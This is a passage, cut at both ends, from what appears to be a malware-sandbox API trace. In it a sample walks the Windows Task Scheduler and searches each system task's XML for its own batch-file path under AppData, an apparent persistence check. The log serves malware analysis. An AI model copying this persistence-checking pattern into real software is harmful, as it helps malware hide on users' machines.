\r\n %windir%\\System32\\LocationNotificationWindows.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.391] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.391] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.391] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="WindowsActionDialog") returned 0x0 [0162.391] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.3\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%systemRoot%\\System32\\WindowsActionDialog.exe,-102)\r\n \\Microsoft\\Windows\\Location\\WindowsActionDialog\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7548BCA321089541\r\n \r\n \r\n \r\n \r\n %windir%\\System32\\WindowsActionDialog.exe\r\n \r\n \r\n") returned 0x0 [0162.391] StrStrIW (lpFirst="\r\n\r\n \r\n 1.3\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%systemRoot%\\System32\\WindowsActionDialog.exe,-102)\r\n \\Microsoft\\Windows\\Location\\WindowsActionDialog\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7548BCA321089541\r\n \r\n \r\n \r\n \r\n %windir%\\System32\\WindowsActionDialog.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.392] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.392] IUnknown:Release (This=0x929460) returned 0x0 [0162.392] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.392] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.392] IUnknown:Release (This=0x929460) returned 0x0 [0162.392] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.392] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x20, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.393] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.393] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.393] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.393] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="WinSAT") returned 0x0 [0162.393] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2008-02-25T19:15:00\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-113)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-112)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-114)\r\n \\Microsoft\\Windows\\Maintenance\\WinSAT\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT30M\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {A9A33436-678B-4C9C-A211-7CC38785E79D}\r\n \r\n \r\n") returned 0x0 [0162.394] StrStrIW (lpFirst="\r\n\r\n \r\n 2008-02-25T19:15:00\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-113)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-112)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-114)\r\n \\Microsoft\\Windows\\Maintenance\\WinSAT\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT30M\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {A9A33436-678B-4C9C-A211-7CC38785E79D}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.394] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.394] IUnknown:Release (This=0x929470) returned 0x0 [0162.394] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.394] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.394] IUnknown:Release (This=0x929470) returned 0x0 [0162.394] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.394] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x21, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.394] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.395] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0162.395] IUnknown:Release (This=0x929470) returned 0x0 [0162.395] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.395] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=1) returned 0x0 [0162.395] ITaskFolderCollection:get_Item (in: This=0x929470, index=0xce080*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0xce030 | out: ppFolder=0xce030*=0x929600) returned 0x0 [0162.395] ITaskFolder:GetTasks (in: This=0x929600, flags=1, ppTasks=0xcdea0 | out: ppTasks=0xcdea0*=0x9296e0) returned 0x0 [0162.395] IRegisteredTaskCollection:get_Count (in: This=0x9296e0, pCount=0xcde98 | out: pCount=0xcde98*=1) returned 0x0 [0162.396] IRegisteredTaskCollection:get_Item (in: This=0x9296e0, index=0xcdee8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xcde88 | out: ppRegisteredTask=0xcde88*=0x929880) returned 0x0 [0162.396] IRegisteredTask:get_Name (in: This=0x929880, pName=0xcdea8 | out: pName=0xcdea8*="Logon") returned 0x0 [0162.396] IRegisteredTask:get_Xml (in: This=0x929880, pXml=0xcde80 | out: pXml=0xcde80*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%systemRoot%\\system32\\ProvTool.exe,-101)\r\n $(@%systemRoot%\\system32\\ProvTool.exe,-102)\r\n \\Microsoft\\Windows\\Management\\Provisioning\\Logon\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n StopExisting\r\n 9\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\ProvTool.exe\r\n /turn 5\r\n \r\n \r\n") returned 0x0 [0162.396] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%systemRoot%\\system32\\ProvTool.exe,-101)\r\n $(@%systemRoot%\\system32\\ProvTool.exe,-102)\r\n \\Microsoft\\Windows\\Management\\Provisioning\\Logon\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n StopExisting\r\n 9\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\ProvTool.exe\r\n /turn 5\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.397] IUnknown:Release (This=0x929880) returned 0x0 [0162.397] IUnknown:Release (This=0x9296e0) returned 0x0 [0162.397] ITaskFolder:GetFolders (in: This=0x929600, flags=0, ppFolders=0xcde88 | out: ppFolders=0xcde88*=0x9296e0) returned 0x0 [0162.397] ITaskFolderCollection:get_Count (in: This=0x9296e0, pCount=0xcde94 | out: pCount=0xcde94*=0) returned 0x0 [0162.397] IUnknown:Release (This=0x9296e0) returned 0x0 [0162.397] TaskScheduler:IUnknown:Release (This=0x929600) returned 0x0 [0162.397] IUnknown:Release (This=0x929470) returned 0x0 [0162.397] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.397] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.397] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.397] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.398] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.398] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="MapsToastTask") returned 0x0 [0162.398] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2014-11-05T00:00:00\r\n D:(A;;0x111FFFFF;;;SY)(A;;0x111FFFFF;;;BA)(A;;0x111FFFFF;;;S-1-5-80-3028837079-3186095147-955107200-3701964851-1150726376)(A;;FRFX;;;AU)\r\n $(@%SystemRoot%\\system32\\mapstoasttask.dll,-600)\r\n $(@%SystemRoot%\\system32\\mapstoasttask.dll,-602)\r\n \\Microsoft\\Windows\\Maps\\MapsToastTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5S\r\n true\r\n Queue\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {9885AEF2-BD9F-41E0-B15E-B3141395E803}\r\n \r\n \r\n \r\n") returned 0x0 [0162.398] StrStrIW (lpFirst="\r\n\r\n \r\n 2014-11-05T00:00:00\r\n D:(A;;0x111FFFFF;;;SY)(A;;0x111FFFFF;;;BA)(A;;0x111FFFFF;;;S-1-5-80-3028837079-3186095147-955107200-3701964851-1150726376)(A;;FRFX;;;AU)\r\n $(@%SystemRoot%\\system32\\mapstoasttask.dll,-600)\r\n $(@%SystemRoot%\\system32\\mapstoasttask.dll,-602)\r\n \\Microsoft\\Windows\\Maps\\MapsToastTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5S\r\n true\r\n Queue\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {9885AEF2-BD9F-41E0-B15E-B3141395E803}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.398] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.398] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.398] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="MapsUpdateTask") returned 0x0 [0162.398] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2014-11-05T00:00:00\r\n D:(A;;0x111FFFFF;;;SY)(A;;0x111FFFFF;;;BA)(A;;0x111FFFFF;;;S-1-5-80-3028837079-3186095147-955107200-3701964851-1150726376)(A;;FRFX;;;NS)(A;;FRFX;;;AU)\r\n $(@%SystemRoot%\\system32\\mapsupdatetask.dll,-600)\r\n $(@%SystemRoot%\\system32\\mapsupdatetask.dll,-602)\r\n \\Microsoft\\Windows\\Maps\\MapsUpdateTask\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT40S\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2014-10-21T00:00:00\r\n \r\n P1D\r\n \r\n PT2H\r\n \r\n \r\n \r\n \r\n {B9033E87-33CF-4D77-BC9B-895AFBBA72E4}\r\n \r\n \r\n") returned 0x0 [0162.399] StrStrIW (lpFirst="\r\n\r\n \r\n 2014-11-05T00:00:00\r\n D:(A;;0x111FFFFF;;;SY)(A;;0x111FFFFF;;;BA)(A;;0x111FFFFF;;;S-1-5-80-3028837079-3186095147-955107200-3701964851-1150726376)(A;;FRFX;;;NS)(A;;FRFX;;;AU)\r\n $(@%SystemRoot%\\system32\\mapsupdatetask.dll,-600)\r\n $(@%SystemRoot%\\system32\\mapsupdatetask.dll,-602)\r\n \\Microsoft\\Windows\\Maps\\MapsUpdateTask\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT40S\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2014-10-21T00:00:00\r\n \r\n P1D\r\n \r\n PT2H\r\n \r\n \r\n \r\n \r\n {B9033E87-33CF-4D77-BC9B-895AFBBA72E4}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.400] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.400] IUnknown:Release (This=0x929460) returned 0x0 [0162.400] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.400] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.400] IUnknown:Release (This=0x929460) returned 0x0 [0162.400] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.400] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x23, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.400] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.401] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.401] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.401] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="ProcessMemoryDiagnosticEvents") returned 0x0 [0162.401] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-601)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-600)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-603)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\ProcessMemoryDiagnosticEvents\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT2H\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n true\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WER-SystemErrorReporting'] and (EventID=1000 or EventID=1001 or EventID=1006)]]</Select></Query></QueryList>\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='Application Error'] and EventID=1000]]</Select></Query></QueryList>\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Application Popup'] and EventID=1801]]</Select></Query></QueryList>\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"><Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\">*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n {8168E74A-B39F-46D8-ADCD-7BED477B80A3}\r\n \r\n \r\n \r\n") returned 0x0 [0162.402] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-601)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-600)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-603)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\ProcessMemoryDiagnosticEvents\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT2H\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n true\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WER-SystemErrorReporting'] and (EventID=1000 or EventID=1001 or EventID=1006)]]</Select></Query></QueryList>\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='Application Error'] and EventID=1000]]</Select></Query></QueryList>\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Application Popup'] and EventID=1801]]</Select></Query></QueryList>\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"><Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\">*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n {8168E74A-B39F-46D8-ADCD-7BED477B80A3}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.402] IUnknown:Release (This=0x929600) returned 0x0 [0162.402] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.403] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="RunFullMemoryDiagnostic") returned 0x0 [0162.403] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-601)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-600)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-602)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\RunFullMemoryDiagnostic\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT2H\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n true\r\n \r\n true\r\n \r\n P7D\r\n P2M\r\n \r\n \r\n \r\n \r\n \r\n {8168E74A-B39F-46D8-ADCD-7BED477B80A3}\r\n \r\n \r\n \r\n") returned 0x0 [0162.403] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-601)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-600)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-602)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\RunFullMemoryDiagnostic\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT2H\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n true\r\n \r\n true\r\n \r\n P7D\r\n P2M\r\n \r\n \r\n \r\n \r\n \r\n {8168E74A-B39F-46D8-ADCD-7BED477B80A3}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.404] IUnknown:Release (This=0x929600) returned 0x0 [0162.404] IUnknown:Release (This=0x929470) returned 0x0 [0162.404] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.404] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.404] IUnknown:Release (This=0x929470) returned 0x0 [0162.404] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.404] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.404] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929490) returned 0x0 [0162.404] IRegisteredTaskCollection:get_Count (in: This=0x929490, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.405] IRegisteredTaskCollection:get_Item (in: This=0x929490, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929630) returned 0x0 [0162.405] IRegisteredTask:get_Name (in: This=0x929630, pName=0xce058 | out: pName=0xce058*="MNO Metadata Parser") returned 0x0 [0162.405] IRegisteredTask:get_Xml (in: This=0x929630, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.3\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%SystemRoot%\\system32\\MbaeParserTask.exe,-1901)\r\n $(@%SystemRoot%\\system32\\MbaeParserTask.exe,-1902)\r\n $(@%SystemRoot%\\system32\\MbaeParserTask.exe,-1903)\r\n \\Microsoft\\Windows\\Mobile Broadband Accounts\\MNO Metadata Parser\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT3M\r\n Queue\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList>\r\n <Query Id='1'>\r\n <Select Path='Microsoft-Windows-DeviceSetupManager/Operational'>*[System/EventID=302] and *[EventData/Data[@Name='Prop_ServiceInfoNamespace']='http://schemas.microsoft.com/windows/2010/12/DeviceMetadata/MobileBroadBandInfo']</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\MbaeParserTask.exe\r\n \r\n \r\n") returned 0x0 [0162.406] StrStrIW (lpFirst="\r\n\r\n \r\n 1.3\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%SystemRoot%\\system32\\MbaeParserTask.exe,-1901)\r\n $(@%SystemRoot%\\system32\\MbaeParserTask.exe,-1902)\r\n $(@%SystemRoot%\\system32\\MbaeParserTask.exe,-1903)\r\n \\Microsoft\\Windows\\Mobile Broadband Accounts\\MNO Metadata Parser\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT3M\r\n Queue\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList>\r\n <Query Id='1'>\r\n <Select Path='Microsoft-Windows-DeviceSetupManager/Operational'>*[System/EventID=302] and *[EventData/Data[@Name='Prop_ServiceInfoNamespace']='http://schemas.microsoft.com/windows/2010/12/DeviceMetadata/MobileBroadBandInfo']</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\MbaeParserTask.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.407] IUnknown:Release (This=0x929630) returned 0x0 [0162.407] IUnknown:Release (This=0x929490) returned 0x0 [0162.407] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929490) returned 0x0 [0162.407] ITaskFolderCollection:get_Count (in: This=0x929490, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.407] IUnknown:Release (This=0x929490) returned 0x0 [0162.407] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.407] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.407] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.408] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.408] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.408] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="LPRemove") returned 0x0 [0162.408] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-101)\r\n \\Microsoft\\Windows\\MUI\\LPRemove\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT9H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P3D\r\n P4D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\lpremove.exe\r\n \r\n \r\n") returned 0x0 [0162.408] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-101)\r\n \\Microsoft\\Windows\\MUI\\LPRemove\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT9H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P3D\r\n P4D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n 